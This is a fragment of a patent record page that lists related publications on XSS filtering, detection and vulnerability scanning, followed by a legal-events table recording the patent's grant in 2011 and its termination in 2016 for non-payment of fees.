| KR20190040046A (en) | Information collection system, information collection method and recording medium | |
| Gupta et al. | POND: polishing the execution of nested context-familiar runtime dynamic parsing and sanitisation of XSS worms on online edge servers of fog computing | |
| Yamazaki et al. | Xilara: An XSS filter based on HTML template restoration | |
| Kim et al. | Hadoop-based Crawling and Detection of New HTML5 Vulnerabilities on Public Institutions’ Web Sites | |
| LIU et al. | XSS vulnerability scanning algorithm based on anti-filtering rules |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant | ||
| CF01 | Termination of patent right due to non-payment of annual fee | ||
| CF01 | Termination of patent right due to non-payment of annual fee |
Granted publication date: 20111012 Termination date: 20161214 |